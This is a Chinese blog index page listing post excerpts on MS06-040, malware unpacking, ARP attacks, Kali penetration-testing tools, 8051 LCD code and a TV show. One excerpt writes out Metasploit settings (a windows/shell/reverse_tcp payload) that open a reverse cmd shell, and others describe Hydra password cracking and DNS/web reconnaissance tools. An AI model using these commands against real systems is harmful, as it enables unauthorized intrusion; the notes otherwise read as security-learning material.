摘要: 背景 Ms06040(Server服务中的缓冲区溢出漏洞)是继ms06035以后的又一个重大漏洞,利用此漏洞的魔波蠕虫已经开始蔓延,相信互连网又会因此掀起血雨腥风。 此漏洞的影响范围有多大? 这是一个远程执行代码漏洞。 成功利用此漏洞的攻击者可以远程完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 造成漏洞的原因是什么? Server 服务中未经检查的缓冲区。 什么是... 阅读全文
posted @ 2014-01-11 17:47 我爱物联网 阅读(1357) 评论(0) 推荐(0)
摘要: 《House of Cards》,首先我得说好看,36个赞,比我以前看的那些美剧都要好看,虽然我是个屌丝程序员,但是我还是希望我自己看书不只看专业的书那种,虽然我是个屌丝程序员,工科男,所以我不喜欢写文章,文采也不好,小学到高中我的作文总是被当作反面教材,但是我喜欢分享,所以,我要分享这部美剧,从这部美剧来说,我学到了不少,不是编程方面的,是为人处事方面的,也只是片面的,希望大家不要吐槽我。 首先,我昨天晚上在看的时候发现一个很奇怪的现象,就是每当每学期期末要考试的时候我便开始看电视剧了,去年的这个时候我看得是《新三国演义》,那个可是有100+集呀呀呀,可是我在两个多星期内边复习边看,我... 阅读全文
posted @ 2014-01-06 17:45 我爱物联网 阅读(1185) 评论(4) 推荐(1)
摘要: ASPack按步就班不能让程序往上跳,否则会进入壳的循环。一直走(F8),走到一个大跳转的时候,那个很有可能就是程序的入口。ESP寄存器当八个寄存器没有变化是ESP地址变化,将找到对应的地址下断点,然而运行,运行附近的代码找到大跳转进入程序入口进行脱壳。PECompact2按F7跟随7C92E493... 阅读全文
posted @ 2013-12-28 14:19 我爱物联网 阅读(1967) 评论(11) 推荐(4)
摘要: 坦白讲,我是个小白,也就是各大黑客和安全厂商所说的目标群体,前者是攻击我,后者有可能保护我。但是无论如何,这次后者应该也很无能为力了——我遭遇到了传说中的Arp攻击。 在连续一周的时间里,我发现我无法上网。而在这一周的时间里,我做过各种尝试:我换过杀毒软件,重装过系统,甚至安装了Win7+Linux的双系统来使用,但是直到昨天晚上,我才猛然想起还有Arp这种攻击方式。 好吧,我承认我运气不好。 我做了很简单的防御,我安装了一款N年前的金山Arp防火墙——我原本是360的忠实用户,但是不知道为什么最新的360版本当中没有找到。装上Arp防火墙以后,立马弹出窗口提示说早到Arp攻击。我本... 阅读全文
posted @ 2013-12-26 20:51 我爱物联网 阅读(1000) 评论(0) 推荐(0)
摘要: 网络漏洞攻击工具Metasploit 先msfupdate升级: 然后选择msfconsole: 接下来:set LHOST 本机IP地址setLPORT 4445setg PAYLOAD windows/shell/reverse_tcpsetg RHOST 目标IP地址setg port 21set target 随意数字exploit这样就可以反弹一个cmd shell了。密码破解Hydra多samba,smb,ssh,smtp,telnet,mysql,ftp,vnc,icq,socks5,pcnfs,cisco等各类主流服务进行在线密码破解攻击尝试攻击。字典破解,Protoco... 阅读全文
posted @ 2013-12-25 20:00 我爱物联网 阅读(1537) 评论(2) 推荐(1)
摘要: Web踩点CMS程序版本探测Blindelephant针对WORDPRESS程序的踩点工具,通过比较插件等一系列的指纹,判断版本。格式:Python Blindelephant.py [参数] url appname表示很蛋疼,什么情况。WhatwebWeb应用程序探测工具。初次使用会提示在终端执行:Update-alternatives –config ruby格式:./whatweb [参数] WAF防火墙探测WaffitWAF防火墙检测工具,作用于探测WEB服务器是否运行了WAF防火墙。格式:./wafw00f.py url1 [url2 [url3 …]]没有WAF防火墙。Web网络爬 阅读全文
posted @ 2013-12-24 19:15 我爱物联网 阅读(1659) 评论(0) 推荐(0)
摘要: 操作系统探测Xprobe2通过ICMP协议来获得指纹,通过模糊矩阵统计分析主动探测数据包对应的ICMP数据特征,进而探测得到远端操作系统的类型。格式:./xprobe2 域名./xprobe2 –v –r IP-v详细-r 显示目标(traceroute)端口服务软件探测Amap用于操作系统判断、端口对应服务版本判断。Application Mapping 模式:amap –A 域名 portBanner模式:amap –B 域名 port -P 检测端口是否开启Dmirty能够最大限度收集一个IP或者域名尽量可能多的信息,它具有子域名查找、whois查询、email地址搜索、信息更新查询,t 阅读全文
posted @ 2013-12-23 22:30 我爱物联网 阅读(1715) 评论(0) 推荐(0)
摘要: DNS记录探测dnsenum 针对NDS信息收集的工具格式:./dnsenum.pl dbsserver (域名) 请原谅我拿freestu.net这个学校团委的域名做的测试,求不黑!!dnsmap DNS类枚举工具,域名暴力破解工具,若是大型网站则比较费时。格式:./dnsmap [参数]-r 表示将破解结果保存至/tmp/目录Dnsrecon 通过GOOGLE查处站点的子域名和IP信息格式:./dnsrecon.py [参数]-d 是指定域名--lifetime 是指定相应时间30sNS是dns.com.cn的,域名也就是那申请的。MX是腾讯的企业邮箱。全暴露了!!!!!!!查... 阅读全文
posted @ 2013-12-22 15:42 我爱物联网 阅读(1534) 评论(0) 推荐(0)
摘要: 不多说,先来非总线型的51的1602液晶显示器的显示程序:#include#include #define uchar unsigned char#define uint unsigned intuchar code table[]="The distance is ";uchar code table1[]=" 00.0cm ";sbit shuru=P1^0;sbit yidianling=P1^0;sbit yidianyi=P1^3;//延时void delay(uint z){ uint x,y; for(x=z;x>0;x--) for 阅读全文
posted @ 2013-12-18 18:06 我爱物联网 阅读(2284) 评论(0) 推荐(0)
摘要: 告诉大家一个坏消息,还是有刷票的行为,有图有真相:倒数第三项是时间轴,倒数第二项是IP,倒数第一项是邮箱,你们要刷票,拦都拦不住呀呀呀呀呀呀!!!!!看看这些时间的间隔,看看这些IP的地址,哎,再看看邮箱,全163的,再也不爱了。 再来看看这些软件,有图有真相:还有神马人工输入验证码的,自动输入验证码的,哎,被秒杀了瞬间。。。。 继上篇刷票风云的随笔之后,我还是决定用每个学生登录教务处的密码尝试一下,虽然这个我在开学的时候做微信开发的时候弄过。 首先要做的是登录学校教务处网站,然后打开sharkwire,取得传过去的信息,这些图我就明天上传补上,现在是用的同学电脑。 获取到传过去的... 阅读全文
posted @ 2013-12-12 23:37 我爱物联网 阅读(2895) 评论(5) 推荐(1)
AmazingCounters.com